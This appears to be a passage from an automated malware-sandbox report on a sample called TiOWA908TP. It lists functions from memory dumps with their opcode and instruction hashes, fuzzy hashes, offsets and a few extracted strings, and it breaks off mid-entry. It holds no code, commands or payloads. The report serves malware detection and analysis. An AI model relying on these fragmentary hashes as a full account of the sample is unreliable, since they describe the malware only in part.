                                      • Opcode ID: b3885a5a19cb9248c99da6658c4fe9c4097619a00e938bd6fa0207d371e26d7b
                                      • Instruction ID: d3915f9ea25d95336ef716f8909e39598ed757ccb7cf6060cece9f1dc80e18e1
                                      • Opcode Fuzzy Hash: b3885a5a19cb9248c99da6658c4fe9c4097619a00e938bd6fa0207d371e26d7b
                                      • Instruction Fuzzy Hash: 6DE0753491522A8FE765DF64D894BADB6B2FB49305F1046A9D50E63645CA301E84CF60
                                      Function 05CA7ED5 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699653252.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ca0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: de5bf66f5c6d1c08eb8ce6e86e354909f8289abae2d7c42ac80cfe0800627813
                                      • Instruction ID: aa75a32bd2ac9cb659c61fa7ea01a9989b38827264ff52753d143f50e8416237
                                      • Opcode Fuzzy Hash: de5bf66f5c6d1c08eb8ce6e86e354909f8289abae2d7c42ac80cfe0800627813
                                      • Instruction Fuzzy Hash: 77E017B960500DAFC711DF98C888BEBB7FEFB89304F008254A60E9B245CA309A05CF91
                                      Function 06CC2758 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702938801.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6cc0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00f311fca903f672a8388944367b8d5c9878a6d12844beaf141e453ff4fb3551
                                      • Instruction ID: 3891d7e3eeec3b8c56a61360726d3e9c44a98a0ec87518aed394a7b79db620c8
                                      • Opcode Fuzzy Hash: 00f311fca903f672a8388944367b8d5c9878a6d12844beaf141e453ff4fb3551
                                      • Instruction Fuzzy Hash: 54D022307000188BC30CA2ACE40445ABBEFDFC871072080AAF40EC3344DE328C8283E1
                                      Function 01350870 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1680351514.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1350000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7cbe6200114e626d1aefad294c662ae78c79be804d40a0d175ac8c3e4e830e8c
                                      • Instruction ID: 41298d88c5541e0ad99a892260d76d0ca012c6059670745fb656220517152eef
                                      • Opcode Fuzzy Hash: 7cbe6200114e626d1aefad294c662ae78c79be804d40a0d175ac8c3e4e830e8c
                                      • Instruction Fuzzy Hash: 19D0A77040420C9AE748953A9808D9B7EFD9B88710F004424F50161188DA32151045A0
                                      Function 06CC6B58 Relevance: .0, Instructions: 14COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702938801.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6cc0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38dfccbb157875c03d6ac590e66782b01718adf51600e3a45054ba1ed81f032a
                                      • Instruction ID: 330abfe54a43f5e21c84a318cfa26ce70dc31663d505df05a3c3b2e0179355e8
                                      • Opcode Fuzzy Hash: 38dfccbb157875c03d6ac590e66782b01718adf51600e3a45054ba1ed81f032a
                                      • Instruction Fuzzy Hash: C7D0A9361592804FC3028F38DF118913F309A1326470A00E6F080CB2B3C72A8A1ACB20
                                      Function 01357A63 Relevance: .0, Instructions: 14COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1680351514.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1350000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d4b255dd3c389e1999da110c294f5f6734b20ef0f84cfbe3bb683c420a6b463f
                                      • Instruction ID: 62552080c94bbe743702cde59da2d3ad8e6716934b84f3bded373aa9721208e9
                                      • Opcode Fuzzy Hash: d4b255dd3c389e1999da110c294f5f6734b20ef0f84cfbe3bb683c420a6b463f
                                      • Instruction Fuzzy Hash: 97E0B6B4E44218DFDB64CF24C845BDAFBF0BB08350F0091D6AA09B7280C3759E808F04
                                      Function 05CAB699 Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699653252.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ca0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb3e0f14cf0a330207d7353d774305fc4893783ab45155c764ead8aaa4d05416
                                      • Instruction ID: 013e90d0e3343db690e0beed38caba04be374f595d4098cc9c2b8cce87cad774
                                      • Opcode Fuzzy Hash: bb3e0f14cf0a330207d7353d774305fc4893783ab45155c764ead8aaa4d05416
                                      • Instruction Fuzzy Hash: 11D09E74E08209CBDB15DFA5E454AEEB7BAEB89308F1051599509A7285C6345D44CF50
                                      Function 05CA9080 Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699653252.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ca0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a049922da958c513f24b5c3d1880a3b14159d05f5713e36890d3a6be5f6277c5
                                      • Instruction ID: 326e1086ccd0b1d15cbf4bae4a151646276bb936ac397f5cd47f4d08bfe045c0
                                      • Opcode Fuzzy Hash: a049922da958c513f24b5c3d1880a3b14159d05f5713e36890d3a6be5f6277c5
                                      • Instruction Fuzzy Hash: 1CD0222080D284C9C312CB3118429567F20640212030C83CBE6B1170E3F8260525C351
                                      Function 01356023 Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1680351514.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1350000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8b8ad64f9e4a171b4fb1e515eba903bd821333b4da7b7fca76e5fbb70008cbd0
                                      • Instruction ID: 348627b366e3c277c44932e59937fd063263152cc4dd4bccb6559316ecea7583
                                      • Opcode Fuzzy Hash: 8b8ad64f9e4a171b4fb1e515eba903bd821333b4da7b7fca76e5fbb70008cbd0
                                      • Instruction Fuzzy Hash: D7E0EAB49002688FCBA5DF24E998698BBF5BB08345F0040DB9A19A3254DB701E84CF18
                                      Function 013593D1 Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1680351514.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1350000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 46ded272a7ee9c5725cb6fe4d13faadabd5198eb7b6bcaf36d4222973dfcab81
                                      • Instruction ID: b308caaa05f5a43b89f4dce64392d9a6c894e76655bd1e4489538531901111d1
                                      • Opcode Fuzzy Hash: 46ded272a7ee9c5725cb6fe4d13faadabd5198eb7b6bcaf36d4222973dfcab81
                                      • Instruction Fuzzy Hash: B5D012B4904119CFCB91DF90E959B9AB7F9FB19718F44216A8C0DE3782C3344D058B19
                                      Function 05CA26A4 Relevance: .0, Instructions: 11COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699653252.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ca0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 46d1ad86296fa412bd40ea5d794f6b145013d13dce2a4e446ae314ebbb02f2a6
                                      • Instruction ID: 2181495887fde3fa9a9ccf8d080a9a3bd5fd848cbb1c97451c1e17620507bcf5
                                      • Opcode Fuzzy Hash: 46d1ad86296fa412bd40ea5d794f6b145013d13dce2a4e446ae314ebbb02f2a6
                                      • Instruction Fuzzy Hash: 51D0C939A01108EF8B40CF84C590D6CFBB1FB98214B20C189DC4897300CA32AF52DB80
                                      Function 05CA6E30 Relevance: .0, Instructions: 11COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699653252.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ca0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3b3fc0a7958a3ebfbcda5b91b549f1db6ac32bd0de14a5fb5b3a3810fb96a9f0
                                      • Instruction ID: 3bebbcd093f46bf5facd7ee2b635c2e1a4e854963a92eb522f7a78b79b30e8c1
                                      • Opcode Fuzzy Hash: 3b3fc0a7958a3ebfbcda5b91b549f1db6ac32bd0de14a5fb5b3a3810fb96a9f0
                                      • Instruction Fuzzy Hash: 8AD0C935E00219CBCF10CFD4E8406CDB771FB84221F104166D619A7640C7315512CF80
                                      Function 01359357 Relevance: .0, Instructions: 11COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1680351514.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1350000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: db29e776282048d7d8b565693296d6f714b5e5c089f68b0672efc764b52edb7d
                                      • Instruction ID: e14ccf980a1d7ff93e801f32f0d61b10fc956b4bf45a3871cf4db6911cffbc9c
                                      • Opcode Fuzzy Hash: db29e776282048d7d8b565693296d6f714b5e5c089f68b0672efc764b52edb7d
                                      • Instruction Fuzzy Hash: 1DD09274C0001DCFCB65CF50D948BD9B7B9BB08304F0010968A19A3640D3705A819F08
                                      Function 06C56F65 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702709092.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6c50000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f1c3d12c27092314c6ec22ab13e29167b1e6b28124a6f8eb0c6bbd7edd828a7b
                                      • Instruction ID: 6a681333b297e52617d0abf2d3dd5cb375c4c5f25491d303b4c56b3608aedc62
                                      • Opcode Fuzzy Hash: f1c3d12c27092314c6ec22ab13e29167b1e6b28124a6f8eb0c6bbd7edd828a7b
                                      • Instruction Fuzzy Hash: 0CC0027AF100299B8B00EFD9E4408DDB7B5FB94725F408127D614A7208D730692ADF91
                                      Function 06949F62 Relevance: .0, Instructions: 9COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701724664.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6940000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a6851ca294f54568cbb8b135116299fcd7f4695c31aeda7ab5e5f72df6b3ded4
                                      • Instruction ID: 3d3639b4715eacc6b70fbcdb520b4ade0fe39780ba9fe1b61980fb5f01c07811
                                      • Opcode Fuzzy Hash: a6851ca294f54568cbb8b135116299fcd7f4695c31aeda7ab5e5f72df6b3ded4
                                      • Instruction Fuzzy Hash: 96D0C930A0462CCFDB74DF24CD54A9ABBB1FB04302F0005D9C549A3259D7302E45CF50
                                      Function 06C58E46 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702709092.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6c50000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ed6d067fdb64f742dc9f1ddb984f293f530f9a6386bba7b0cbd5030c63f00070
                                      • Instruction ID: dda163c1dd1481bd9a3e2030bb47dba9d2d9c5e6938c34eede5031cd7e41f0eb
                                      • Opcode Fuzzy Hash: ed6d067fdb64f742dc9f1ddb984f293f530f9a6386bba7b0cbd5030c63f00070
                                      • Instruction Fuzzy Hash: FDC04C3414511A8FE355AF65D49476EB666F785309F504028551B16588CE344848DB55
                                      Function 06CC4C50 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702938801.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6cc0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                      • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                      • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                      • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                      Function 06CC8D40 Relevance: .0, Instructions: 7COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702938801.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6cc0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 616a1ce3010554dca6fa786afe56fd9a5659c4fe8e31d4de12b12d5207d71d92
                                      • Instruction ID: 409f16bcfc1181c4273d3eb71592beabb45cd61a22bd45b962dd5a1882b9dbf2
                                      • Opcode Fuzzy Hash: 616a1ce3010554dca6fa786afe56fd9a5659c4fe8e31d4de12b12d5207d71d92
                                      • Instruction Fuzzy Hash: 10B0123604020CEBC7049F94E804C95BF6DEB58711B40C035FA0906111CB33F8A2DBD4
                                      Function 0135084C Relevance: .0, Instructions: 7COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1680351514.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1350000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: db0f30648a329f82aa5a964ec5429ffeb8be167fb14e8bf939e82fe0ee6c1f9f
                                      • Instruction ID: 1b0b9d8d9ab26ac06c84938f7426319518f8fad56ef381394b7a972f3f7e4bd2
                                      • Opcode Fuzzy Hash: db0f30648a329f82aa5a964ec5429ffeb8be167fb14e8bf939e82fe0ee6c1f9f
                                      • Instruction Fuzzy Hash: 64B01230009188BAC35B2AF0E019CB23E2C6942718380888FF8428CC034B0F08448682

                                      Non-executed Functions

                                      Function 06946F68 Relevance: 2.9, Strings: 2, Instructions: 431COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701724664.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6940000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,YF$Upt
                                      • API String ID: 0-662607101
                                      • Opcode ID: 7c74dcd8ba6412f4d89c1bd63e362484c8140d1b7b22cb12b58d6fc02bda7e4d
                                      • Instruction ID: 7c072892f72cf0c86f37d8f3d3b9ff0b2a41648ae4baf4c8a537650ee07b04ce
                                      • Opcode Fuzzy Hash: 7c74dcd8ba6412f4d89c1bd63e362484c8140d1b7b22cb12b58d6fc02bda7e4d
                                      • Instruction Fuzzy Hash: 3212C271E006198FDB54DFAAC980A9DFBF2FF88304F28C569D458AB219D734A946CF50
                                      Function 0691279B Relevance: 2.8, Strings: 1, Instructions: 1564COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701571900.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6910000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4mNq
                                      • API String ID: 0-1476053944
                                      • Opcode ID: a417893568d5e6df53cb8017a57a031cf1d7df8404db7f56016110f847d3a45b
                                      • Instruction ID: 40d3d5ce2dd77b4549067c05e2d8ef22d7237eef3e6abe2674a7e3cfae55d54d
                                      • Opcode Fuzzy Hash: a417893568d5e6df53cb8017a57a031cf1d7df8404db7f56016110f847d3a45b
                                      • Instruction Fuzzy Hash: 3CC25E7094A384AFD7279B79CC19F9A7F79AF46300F2944EAE1409B2E3C2745845CB72
                                      Function 06C50040 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702709092.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6c50000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: &$a
                                      • API String ID: 0-148656936
                                      • Opcode ID: b2dc2bbc3c045ae09d9d9acc04e9938ac307274f0e7be596273bb25b2b16fd4d
                                      • Instruction ID: 514d4deeb4ff40d48a5bfb7209773efebb3cfb5b7be7d433a1f77a8f44b814bc
                                      • Opcode Fuzzy Hash: b2dc2bbc3c045ae09d9d9acc04e9938ac307274f0e7be596273bb25b2b16fd4d
                                      • Instruction Fuzzy Hash: 5421EAB1E046588BEB58CF6B8C0429EFAF7AFC8301F14D07AC909AB255DB745986CF44
                                      Function 05CA1598 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699653252.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ca0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: pqI
                                      • API String ID: 0-1078129942
                                      • Opcode ID: be8eb57edfee257c984f44c8dd808c326429dc974628c2a6ae9652da494e6291
                                      • Instruction ID: 29949cddeba94140d397b78b84669f1bd7d17d976fd07e92156f485b81db483e
                                      • Opcode Fuzzy Hash: be8eb57edfee257c984f44c8dd808c326429dc974628c2a6ae9652da494e6291
                                      • Instruction Fuzzy Hash: 1941A575E4950A9FCB05CFAAC8812AEBFF2BB88304F689965D406D7310E334DA41CB90
                                      Function 05CA15A8 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699653252.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ca0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: pqI
                                      • API String ID: 0-1078129942
                                      • Opcode ID: 98cae284f8bd8e40cccd54cf001125f7606bb85980ecc75849e7392a18f31031
                                      • Instruction ID: 06f3bb980a04bb6cc774ec205f0d0b0ba80adc1a40a652f5d2046ddd0bced48e
                                      • Opcode Fuzzy Hash: 98cae284f8bd8e40cccd54cf001125f7606bb85980ecc75849e7392a18f31031
                                      • Instruction Fuzzy Hash: E8417076E4550ADFCB44CFAAC4812AEBFF6BB88304F689925D506E7314E734DA41CB90
                                      Function 0694761F Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701724664.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6940000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5
                                      • API String ID: 0-2226203566
                                      • Opcode ID: ee54307ea97c73dea352eced164e8fc4fb14b282f77fd496a2afa752c7363a21
                                      • Instruction ID: ca158956199e7f8cbf8cfebee73b5b9ce1061aa1fff77b138f711b9bc6b623b0
                                      • Opcode Fuzzy Hash: ee54307ea97c73dea352eced164e8fc4fb14b282f77fd496a2afa752c7363a21
                                      • Instruction Fuzzy Hash: 3A414075E05A188FEB6CCF6B9D4069EFAF7AFC9301F14D1BAC44CAA255EB3005468E41
                                      Function 06C50011 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702709092.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6c50000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: &
                                      • API String ID: 0-1010288
                                      • Opcode ID: c935113bd6b6c3e9f5f4303b3cd2416e48a10a10ddcc262d07963c701dec75a5
                                      • Instruction ID: 95f8afbcc08c792a87ceb26c3c9ff7a149d6ceaac952655d095c65207e40d98f
                                      • Opcode Fuzzy Hash: c935113bd6b6c3e9f5f4303b3cd2416e48a10a10ddcc262d07963c701dec75a5
                                      • Instruction Fuzzy Hash: 9521FD71D046988BD759CF6BCC4068DBBF7AFC5301F18C0BAC849AB256DA345546CF15
                                      Function 0694E938 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701724664.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6940000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $
                                      • API String ID: 0-3993045852
                                      • Opcode ID: c0918f31e08adf3ef217e8330150a5b42a81f0566879c03c018867eb273ed3fa
                                      • Instruction ID: 47ff9cf36dce72f5c38ed55a2c5ae033016f8a8a7f277a42d50813da6ffb9537
                                      • Opcode Fuzzy Hash: c0918f31e08adf3ef217e8330150a5b42a81f0566879c03c018867eb273ed3fa
                                      • Instruction Fuzzy Hash: 5731FB70E042188FEB58DF6AC900B9EB7F6BB89300F14C0AAC90DA7244D7714E45CF91
                                      Function 05CAB1C0 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699653252.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ca0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: +
                                      • API String ID: 0-2126386893
                                      • Opcode ID: 74f444054b86db56c365a25df176c156d22c85038fc3412d54b9cb64bda3312d
                                      • Instruction ID: 7cdb8c307e70a4416c79c515b1a3ac2d2d05b62c2b9c0fc70aa286eaab2ae5cd
                                      • Opcode Fuzzy Hash: 74f444054b86db56c365a25df176c156d22c85038fc3412d54b9cb64bda3312d
                                      • Instruction Fuzzy Hash: 8D21E9B5D046198BEB18CFABD8046AEBBF7BF89308F14D53AD409AB254DB345901CF40
                                      Function 06C5F198 Relevance: .3, Instructions: 343COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702709092.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6c50000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c286d6226e8f19539685f35671f4827903959d0787bf1b783a0d53ca56cb6a33
                                      • Instruction ID: c1d66812a0274cb8069c9d1e0a1c665899c5d9d51b1a2ca430470c96e1b1e4ee
                                      • Opcode Fuzzy Hash: c286d6226e8f19539685f35671f4827903959d0787bf1b783a0d53ca56cb6a33
                                      • Instruction Fuzzy Hash: 5CE12C35A002058FDB58CF69C984A6EBBF2BF88311F66C499D815AB3A1D734ED81CF54
                                      Function 06C577F8 Relevance: .2, Instructions: 248COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702709092.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6c50000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 856bf87b4214cb6d08006cc116ec432c9847a052c0cf284617e21577456ee624
                                      • Instruction ID: 387620daaa80a84fe7b76abfc0e5842086cf5040852cc864ca4ec7d4b484d359
                                      • Opcode Fuzzy Hash: 856bf87b4214cb6d08006cc116ec432c9847a052c0cf284617e21577456ee624
                                      • Instruction Fuzzy Hash: 0EB12670E04218CFEB94DFAAD884B9DBBF2FB89300F11906AD819A7255DB3459C5CF64
                                      Function 06C577F3 Relevance: .2, Instructions: 241COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702709092.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6c50000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8db05107b1a9a36081bd83f1666c7e7e82dcab7ee358fa8aa7f8d842ff425b9e
                                      • Instruction ID: 9f8b1e127c738f2129fee8887eaa6f120929cd337824979dbcfb3804e146e36d
                                      • Opcode Fuzzy Hash: 8db05107b1a9a36081bd83f1666c7e7e82dcab7ee358fa8aa7f8d842ff425b9e
                                      • Instruction Fuzzy Hash: 79A10370E04218CFEB94DFAAD884B9DBBF2FB88304F11906AD819A7255DB3459C5CF64
                                      Function 06CCD347 Relevance: .2, Instructions: 215COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702938801.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6cc0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 34a9cc593a7f80263e30fce22e0d667dc4a30146b4b8ffdf96ef2c1bb7933571
                                      • Instruction ID: 7454647d47d982301fb7fbc19ecd9a488534d59b97ad2375e412c518a7ae49db
                                      • Opcode Fuzzy Hash: 34a9cc593a7f80263e30fce22e0d667dc4a30146b4b8ffdf96ef2c1bb7933571
                                      • Instruction Fuzzy Hash: B9915674D14218CFDB50DFA9D8847ADBBF2FF89314F10806AD50AA7294DB346A89CF51
                                      Function 06CE3663 Relevance: .2, Instructions: 209COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702991156.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6ce0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0dd9e21ccec93fc67203b721fda2946104eee264f13192874bc8dca4f77f6e62
                                      • Instruction ID: 86add644ae4ad6c01b49d7d69f26b3ef0707d317c04e6807991f78b9c2796ee7
